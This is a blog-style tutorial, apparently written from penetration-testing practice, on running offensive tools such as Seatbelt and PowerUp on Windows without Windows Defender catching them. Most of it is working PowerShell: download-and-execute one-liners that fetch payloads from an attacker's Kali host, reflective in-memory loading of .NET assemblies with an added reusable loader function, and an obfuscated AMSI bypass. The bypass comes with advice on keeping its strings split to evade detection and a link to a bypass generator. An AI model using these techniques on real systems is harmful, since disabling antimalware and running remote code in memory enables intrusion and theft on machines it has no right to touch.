I recently began reviewing some material to reinforce my understanding of some areas. During a session where I was practicing file transfer techniques I came across a conundrum. I had to test many techniques for transferring files to Windows, but some of the techniques I was trying didn't work.

Well, that's not exactly right!

The commands ran successfully, but Windows Defender kept deleting the malicious files. I didn't have administrator rights on the server, so disabling Windows Defender was out of the picture.


Then I thought… maybe I can try a fileless technique! If Windows Defender deletes my tools from the machine because they are dropped on the disk, then maybe I can run the tool directly in memory. This is known as a fileless attack.

I tried using IEX to download a file and run it from memory:

IEX (New-Object Net.WebClient).DownloadString('http://<Kali IP>:<Port>/Seatbelt.exe')

But I stumbled upon another obstacle. I was getting the following error in PowerShell:

This script contains malicious content and has been blocked by your antivirus software.

I was frustrated! But I had one more trick up my sleeve. I could try to bypass AMSI. So what is AMSI?

AMSI stands for Antimalware Scan Interface. It's a Windows security feature first introduced by Microsoft in Windows 10 and Windows Server 2016. AMSI acts as a standardized interface that allows applications and services to integrate with any antimalware product installed on a machine.

Before a script or code executes, the application sends the content to AMSI, which passes it to the registered antimalware engine for scanning. PowerShell does this for every script block it is about to run (the download-and-IEX one-liner above included), which is why the content is inspected even though nothing was written to disk. If the engine flags it as malicious, the script's execution is blocked!

AMSI Bypass for executable files:

Solution: Download the executable as raw bytes and load it reflectively, so the tool runs with a fileless method. I ran the following commands to be able to download and run an executable (.exe) file in memory. Note that this works because Seatbelt is a .NET assembly; `[System.Reflection.Assembly]::Load` only accepts managed PEs, and a native EXE would fail with a BadImageFormatException. Also, on .NET Framework 4.8 and later the bytes passed to `Assembly.Load` are themselves submitted to AMSI, so this removes the on-disk artifact but does not by itself stop the assembly from being scanned:

PS C:\> $bytes = (New-Object Net.WebClient).DownloadData('http://<kali-ip>:<port>/Seatbelt.exe')   # raw bytes, never written to disk

PS C:\> $assembly = [System.Reflection.Assembly]::Load($bytes)   # reflectively load the .NET assembly from memory

PS C:\> $entry = $assembly.EntryPoint   # Seatbelt's static Main(string[] args)

PS C:\> $entry.Invoke($null, @(, [string[]] @('-group=all')))   # one Invoke() parameter: the string[] passed as args

After entering the last command, Seatbelt.exe executed flawlessly in the PowerShell session!
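The four commands above are fine for an interactive session. As an added example (not code from the original post or from the Seatbelt project), the function below packages the same reflective-load technique into something reusable and handles two things a practitioner runs into in practice: an entry point declared as `Main()` with no parameters, which must be invoked with no argument array, and tools that write their results with `Console.Write*`, whose output reaches the screen in an interactive window but is frequently lost in a reverse shell or a runspace. The URL, the `-group=all` argument and the function name are placeholders and assumptions of this example.

```powershell
# Added example, not from the original post: generic in-memory loader for a
# .NET assembly. Only managed PEs can be loaded this way (native EXEs throw
# BadImageFormatException), and on .NET Framework 4.8+ the bytes handed to
# Assembly.Load are still submitted to AMSI.
function Invoke-AssemblyFromBytes {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [byte[]] $Bytes,   # raw assembly bytes (e.g. from DownloadData)
        [string[]] $Arguments = @()               # passed to Main(string[] args)
    )

    # Load directly from memory; nothing is written to disk.
    $assembly = [System.Reflection.Assembly]::Load($Bytes)
    $entry = $assembly.EntryPoint
    if (-not $entry) {
        throw "Assembly $($assembly.FullName) has no entry point (is it a DLL?)"
    }

    # MethodInfo.Invoke() wants one array element per parameter of the target.
    # Main(string[] args) takes exactly one parameter (the string[]), so wrap
    # the whole argument array as a single element; Main() takes none.
    $invokeArgs = if ($entry.GetParameters().Count -eq 0) { $null } else { @(, $Arguments) }

    # Redirect Console.Out to a StringWriter for the duration of the call so the
    # tool's output is returned as a string instead of going to the console.
    $oldOut = [Console]::Out
    $writer = New-Object System.IO.StringWriter
    [Console]::SetOut($writer)
    try {
        $entry.Invoke($null, $invokeArgs) | Out-Null
    }
    finally {
        [Console]::SetOut($oldOut)   # always restore the original console stream
    }
    return $writer.ToString()
}

# Usage (placeholder host/port, assumed for this example): same download step
# as above, then run Seatbelt's "-group=all" check set and keep the output.
$bytes  = (New-Object Net.WebClient).DownloadData('http://<kali-ip>:<port>/Seatbelt.exe')
$output = Invoke-AssemblyFromBytes -Bytes $bytes -Arguments @('-group=all')
$output
```

Because the returned text is an ordinary string, it can be filtered with `Select-String` or written out with `Out-File` like any other PowerShell output, rather than scrolling past in a shell you cannot page through.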

AMSI Bypass for PowerShell scripts:

But what if you need to run PowerShell scripts (.ps1)? That's a bit different. The commands below set PowerShell's internal "AMSI failed to initialise" flag, after which the process skips scanning entirely; the effect is limited to the current PowerShell process. The string splitting and `-f` formatting are there only to keep the literal type and field names out of the command line, because Defender flags them when they appear in clear text. Do not tidy the strings back together, and keep any comments free of those names as well, since the whole line is what gets scanned. Use the following commands to be able to run the scripts:

PS C:\> $w = 'System.Management.Automation.A';$c = 'si';$m = 'Utils'   # fragments of the internal type name

PS C:\> $amsiUtils = [Ref].Assembly.GetType(('{0}m{1}{2}' -f $w,$c,$m))   # resolve the internal type from the PowerShell assembly

PS C:\> $field = $amsiUtils.GetField(('am{0}InitFailed' -f $c),'NonPublic,Static')   # the private static initialisation-failed flag

PS C:\> $field.SetValue($null,$true)   # static field, so no instance; PowerShell now skips scanning in this process

Then, you can use IEX to download a .ps1 and run it from memory. Use the following commands:

PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://<kali-ip>:<port>/PowerUp.ps1')

PS C:\> Invoke-AllChecks

# Alternatively, you can chain the commands with `;`:
PS C:\> IEX (New-Object Net.WebClient).DownloadString('http://<kali-ip>:<port>/PowerUp.ps1'); Invoke-AllChecks

So that's it! Now you know what to do in a similar scenario! You learned how to bypass AMSI for executable files and PowerShell scripts, and how to download them and run them in memory!

Additionally, you can use this website to generate obfuscated bypasses that break or disable AMSI: https://amsi.fail/